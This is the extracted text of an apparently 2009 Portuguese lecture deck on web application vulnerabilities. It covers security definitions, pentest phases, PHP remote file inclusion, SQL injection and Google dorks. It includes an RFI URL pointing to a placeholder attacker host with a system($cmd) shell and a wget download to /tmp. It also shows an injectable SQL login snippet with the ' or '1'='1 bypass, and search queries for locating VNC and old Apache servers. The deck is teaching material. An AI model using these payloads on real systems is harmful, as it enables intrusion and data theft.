Segurança da Informação Segurança e Vulnerabilidades

Propaganda
Segurança da Informação
• Apresentação
Segurança e Vulnerabilidades
em Aplicações Web
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
Jordan M. Bonagura
[email protected]
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Definição: Segurança
• Apresentação
Segundo o dicionário da Wikipédia, o termo segurança significa:
• Definições
1. Condição ou estado de estar seguro ou protegido.
• Dados Estatísticos
2. Capacidade de manter seguro.
3. Proteção contra a fuga ou escape.
• Mecanismos de Seg.
4. Profissional ou serviço responsável pela guarda e proteção de algo.
• Taxonomia do Ataque
5. Confiança em si mesmo.
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Definição: Informação
• Apresentação
Segundo a norma ISO 27002, ”A informação é um ativo que, como qualquer outro
• Definições
ativo importante, é essencial para os negócios da empresa e conseqüentemente
necessita ser adequadamente protegida”.
• Dados Estatísticos
• Mecanismos de Seg.
http://www.abntcatalogo.com.br/norma.aspx?ID=1532
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Definição: Segurança da Informação
Portanto, podemos concluir que a Segurança da Informação, está relacionada com a
• Apresentação
• Definições
proteção de um conjunto de informação, no sentido de preservar o valor que
estes possuem para um indivíduo ou para uma organização.
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Propriedades da Segurança da Informação
São
características
básicas
da
segurança
da
informação
• Apresentação
os
atributos
de
Confidencialidade, Integridade e Disponibilidade, não estando está segurança
restrita somente a sistemas computacionais, informações eletrônicas ou sistemas de
armazenamento.
Este conceito se aplica a todos os aspectos de proteção de informações e dados,
incluindo os sistemas em si.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Propriedades da Segurança da Informação
• Apresentação
CONFIDENCIALIDADE - propriedade que limita o acesso a informação tão somente
às entidades legítimas, ou seja, àquelas autorizadas pelo proprietário da informação.
• Definições
INTEGRIDADE - propriedade que garante que a informação manipulada mantenha
• Dados Estatísticos
todas as características originais estabelecidas pelo proprietário da informação,
incluindo controle de mudanças e a garantia do seu ciclo de vida.
DISPONIBILIDADE - propriedade que garante que a informação esteja sempre
disponível para o uso legítimo, ou seja, por aqueles utilizadores autorizados pelo
proprietário da informação.
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Propriedades da Segurança da Informação
O nível de segurança desejado está diretamente relacionado a uma política de
segurança que é seguida pela organização, para garantir que uma vez estabelecidos
os princípios, aquele nível desejado seja perseguido e mantido.
PARADIGMA:
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Terminologias: Segurança
VULNERABILIDADE - Fragilidade de software, hardware ou procedimento que
pode fornecer a um atacante a maneira para entrar em um computador ou rede e
ganhar acesso às informações do ambiente.
• Apresentação
• Definições
• Dados Estatísticos
AMEAÇA - Agente ou ação, espontâneo ou proposital, que aproveita das vulnerabilidades
de um ambiente para conseguir seu intento.
• Mecanismos de Seg.
RISCO – Calculado considerando o nível de impacto e a probabilidade de uma ameaça
• Taxonomia do Ataque
ATAQUE – Incidência da ameaça sobre a vulnerabilidade.
• Aplicação Web
EXPLOIT – Programa capaz de explorar uma vulnerabilidade.
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Terminologias: Segurança
Exemplo de vulnerabilidade:
“Uso de protocolos inseguros para transmissão dos dados.”
• Apresentação
• Definições
• Dados Estatísticos
Exemplo de ameaça:
“Um funcionário insatisfeito com a empresa.”
• Mecanismos de Seg.
Exemplo de ataque:
“O usuário insatisfeito capturando o tráfego de rede.”
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Dados Estatísticos
• Apresentação
De acordo com a pesquisa elaborada pelo Computer Security Institute em 2008, mais
de 70% dos ataques partem de utilizadores legítimos de sistemas de informação, ou
• Definições
seja, os famosos “Insiders”.
• Dados Estatísticos
Interno (70% dos ataques)
Externo
 Funcionários Insatisfeitos;
 Crackers
 Funcionários Despreparados;
 Concorrentes;
 Espionagem
 Espionagem.
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
Fonte: http://www.gocsi.com/
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Dados Estatísticos – Abril a Junho de 2009
Varreduras em
redes.
Incidentes em que
ocorre uma tentativa
de acesso
• Apresentação
Propagação
de de
Desfiguração
códigos
páginas ou
automatizados
comprometimento
• Definições
servidores
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
Ataque bem
sucedido
http://www.cert.br/
http://www.honeypots-alliance.org.br/stats/
Outros tipos
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Ataque de negação
de serviço
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Dados Estatísticos – 1º Semestre de 2009
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Dados Estatísticos – 1º Semestre de 2009
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Dados Estatísticos – 1º Semestre de 2009
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Mecanismos de Segurança
Controles Físicos - são barreiras que limitam o contato ou acesso direto a
informação, ou a infra-estrutura que a suporta.
• Apresentação
• Definições
• Dados Estatísticos
Ex.:
 Portas;
• Mecanismos de Seg.
 Trancas;
 Paredes;
• Taxonomia do Ataque
 Blindagem;
 Câmeras;
• Aplicação Web
 Guardas.
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Mecanismos de Segurança
Controles Lógicos - são barreiras que impedem ou limitam (controlam), de acordo
com os padrões pré estabelecidos, o acesso a informação.
• Apresentação
• Definições
• Dados Estatísticos
Ex.:
 Criptografia;
• Mecanismos de Seg.
 Firewall;
 Anti Vírus;
• Taxonomia do Ataque
 IDS / IPS;
 Anti Spam;
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Mecanismos de Segurança
• Apresentação
Além de dispositivos de segurança, também existem diversos serviços relacionados a
segurança da informação.
• Definições
Ex.:
• Dados Estatísticos
 Criação de Políticas de Segurança;
 Hardening de Servidores;
 Análise de Vulnerabilidades;
 Teste de Intrusão (Pen Test);
 Análise de Aplicações (Testes);
 Treinamento de Colaboradores.
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Procedimentos de um Pen Test
• Apresentação
Os procedimentos realizados por um profissional de Pen Test são muito similares aos
procedimentos realizados pelos Crackers, porém com diferentes éticas e intenções.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
1. Levantamento de Informações
• Apresentação
Nesta fase emprega-se aproximadamente 90% do tempo gasto em uma análise
• Definições
de segurança (Pen Test).
Nesta etapa, o principal objetivo do profissional é conseguir o maior número de
informações sobre o alvo, para somente então, começar a planejar a melhor
maneira de sua intrusão.
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
Quanto maior o tempo empregado nesta fase, maior a probabilidade de
sucesso na fase de acesso.
• Aplicação Web
Fonte: Certificação de Hacker Ético
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
1. Levantamento de Informações
• Apresentação
Nesta fase procura-se conhecer:
• Definições
 Informações sobre a organização ou pessoa alvo;
 Informações sobre os servidores da organização;
 Informações sobre os funcionários da organização;
 Informações sobre os amigos e pessoas chaves da organização;
 Endereços de e-mail, telefones e nº de registro (crachá);
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
 Sistemas e equipamentos utilizados (parcerias);
 Qualquer outra informação relacionada com o negócio.
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
2. Varreduras
• Apresentação
Nesta etapa, o profissional se utiliza das informações descobertas na fase
anterior e as usa para examinar a rede de maneira direcionada, conduzindo
uma série de “buscas”, com a finalidade de obter as versões de sistemas e
serviços que possam ser explorados, ou seja, que possam estar vulneráveis.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
Nesta fase procura-se conhecer:
 Sistemas operacionais utilizados e suas versões;
• Taxonomia do Ataque
 Serviços utilizados e suas versões;
 Existência de IDS/IPS, firewalls e outros controles de segurança.
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
3. Ganhando Acesso
• Apresentação
Nesta fase, é onde a invasão realmente ocorre.
• Definições
Através das informações obtidas nas fases anteriores, fazem possíveis a descoberta
de vulnerabilidades que agora podem ser exploradas para obter acesso ao sistema.
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
4. Mantendo Acesso e 5. Limpando Rastros
• Apresentação
Estas duas fases são as que basicamente diferenciam os profissionais de Pen Test
dos Crackers, pois um profissional autorizado (pen test), não precisará manter
• Definições
acesso ao equipamento, nem mesmo efetuar a limpeza de registros, uma vez que já
efetuou os serviços contratados e relatará todos os problemas diagnosticados ao seu
cliente.
• Dados Estatísticos
• Mecanismos de Seg.
Obs.: Porém, é de extrema importante que este profissional verifique tanto
possibilidade de criação de um ambiente para futuros acessos.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Obtendo Informações
• Apresentação
Obtendo Informações do Domínio
• Definições
Ex.: Comando whois e/ou visita ao site http://www.registro.br
Neste momento conseguimos obter quais informações??
Nome e IP dos servidores DNS;
Nome do Responsável pelo domínio;
Datas de alteração e criação;
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
Usuário - E-mail;
CNPJ.
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Obtendo Informações
• Apresentação
Detecção do Sistema Operacional
• Definições
Ex.: Ping (ICMP)
• Dados Estatísticos
 Cyclades - Normalmente 30
 Linux - Normalmente 64
 Windows - Normalmente 128
• Mecanismos de Seg.
• Taxonomia do Ataque
 Cisco - Normalmente 255
 Linux + iptables - Normalmente 255
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Obtendo Informações
• Apresentação
Sites Antigos
• Definições
Ex.: site http://www.archive.org
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Entendo a aplicação WEB
• Apresentação
Aplicações web são programas que ficam em um servidor web e executam tarefas
para dar uma resposta ao usuário.
Webmails, web fóruns e blogs são bons exemplos de aplicações web.
Uma aplicação web utiliza uma arquitetura cliente/servidor.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
Melhor exemplificando:
Com um navegador web, o cliente acessa o servidor onde a aplicação(página) está
• Aplicação Web
armazenada (Web Server).
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Entendo a aplicação WEB
• Apresentação
Com a exploração de uma aplicação web é possível ganhar acesso a informações
• Definições
confidenciais.
Aplicações web são críticas para a segurança, pois usualmente elas estão
conectadas com uma base de dados que muitas vezes contém informações
sigilosas do negócio ou mesmo de seus clientes (dados financeiros,
senhas, etc).
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
PHP Injection
• Apresentação
Mais conhecida como Remote File Inclusion (RFI) ou Inclusão de arquivo remota,
essa falha permite que um usuário malicioso execute o seu próprio arquivo PHP no
site vulnerável.
• Definições
• Dados Estatísticos
Estas técnicas são chamadas de Server Side Attack
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
PHP Injection – Funcionamento do PHP
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
http://www.criarweb.com/artigos/images/diagrama-php.gif
Vulnerabilidades em Aplicações Web
PHP Injection
• Apresentação
Exemplo de um arquivo (index.php) vulnerável:
• Definições
Dentro do arquivo index.php existe a linha:
• Dados Estatísticos
include($page);
http://www.site.com.br/index.php?page=noticias.php
• Mecanismos de Seg.
Resultado: Executar o arquivo noticias.php
• Taxonomia do Ataque
http://www.site.com.br/index.php?page=servicos.php
Resultado: Executar o arquivo servicos.php
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
PHP Injection
• Apresentação
(Chamada Maliciosa)
http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php
Resultado: Executar o arquivo.php
Dessa forma o atacante consegue “inserir” (interpretar) um arquivo que ele controle,
podendo usar funções maliciosas, como por exemplo a função system(), que servirá
para executar os comandos que o atacante desejar no sistema vulnerável.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
PHP Injection
• Apresentação
(Chamada Maliciosa)
• Definições
Exemplo do arquivo PHP (arquivo.php) do atacante:
system($cmd);
• Dados Estatísticos
• Mecanismos de Seg.
http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php&c
• Taxonomia do Ataque
md=ls
Resultado: Executar o arquivo.php que listará o conteúdo do diretório onde o
index.php está localizado
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
PHP Injection
• Apresentação
http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php&c
md=wget www.sitedeexploits.com/arquivo.pl /tmp/bd.pl
Falhas dessa classe ocorrem simplesmente porque o programador não filtrou o
conteúdo que recebe de um usuário.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
Este então executa a chamada para funções para executar comandos no sistema,
como por exemplo, a função system() do PHP.
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
SQL Injection
• Apresentação
SQL Injection é um vulnerabilidade que ocorre quando na programação não é
realizada a filtragem de caracteres especiais enviados pelo usuário antes de fazer a
requisição para o banco de dados, ou seja, desta maneira, estes caracteres serão
interpretados pelo banco de dados diretamente.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
SQL Injection é a vulnerabilidade mais comum em aplicações web.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
SQL Injection – Funcionamento do SQL
O SQL basicamente verifica se as querys executadas tem uma sintaxe válida e com
isso retornam verdadeiro ou falso.
• Apresentação
• Definições
• Dados Estatísticos
Ex.:
• Mecanismos de Seg.
SELECT nome from users;
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
SQL Injection
• Apresentação
Analisando o trecho de código abaixo:
• Definições
function Login( cn )
{
• Dados Estatísticos
var username;
var password;
username = Request.form("username");
• Mecanismos de Seg.
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password
• Taxonomia do Ataque
= '" + password + "'";
• Aplicação Web
....
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
SQL Injection
• Apresentação
Analisando o trecho de código abaixo:
• Definições
Select * from users where username = „” + username + “‟ and password = „” +
password “‟;
• Dados Estatísticos
Como ficaria a chamada no banco de dados se enviássemos no username e
password o conteúdo: „ or „1‟=„1 ?
• Mecanismos de Seg.
• Taxonomia do Ataque
Select * from users where username = „‟ or „1‟=„1‟ and password = „‟ or „1‟=„1‟;
Como 1 é sempre igual a 1, teremos uma “verdade” e passaremos pela checagem.
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Google Hacking
• Apresentação
Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou
melhor proteger as informações de uma empresa.
As informações disponíveis nos servidores web da empresa provavelmente estarão nas
bases de dados do Google.
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
Um servidor mal configurado pode expor diversas informações da empresa
• Taxonomia do Ataque
no Google.
• Aplicação Web
Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google.
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Google Hacking
• Apresentação
 Detectando sistemas que usando a porta 8080
• Definições
inurl:8080 -intext:8080
• Dados Estatísticos
 Encontrando VNC
intitle:VNC inurl:5800 intitle:VNC ou intitle:"VNC Viewer for Java“
 Encontrando Apache 1.3.20:
• Mecanismos de Seg.
• Taxonomia do Ataque
"Apache/1.3.20 server at" intitle:index.of
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
Descuido – Erros de Configuração
• Apresentação
Listagem de Diretórios
Demonstração de campos e valores na barra de endereço
Arquivos Antigos / Backup
• Definições
• Dados Estatísticos
Extrações de Banco de Dados
Usuários e Senhas Padrões
Usuários e Senhas “fracas” (Brute Force)
Demonstração de Versões/Sistemas que estão sendo utilizados. (Apache / FTP /
• Mecanismos de Seg.
• Taxonomia do Ataque
Webmail)
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Vulnerabilidades em Aplicações Web
• Apresentação
• Definições
• Dados Estatísticos
• Mecanismos de Seg.
• Taxonomia do Ataque
• Aplicação Web
• Vulnerabilidades
Vulnerabilidades em Aplicações Web
Jordan M. Bonagura
Data: 12/11/2009
Download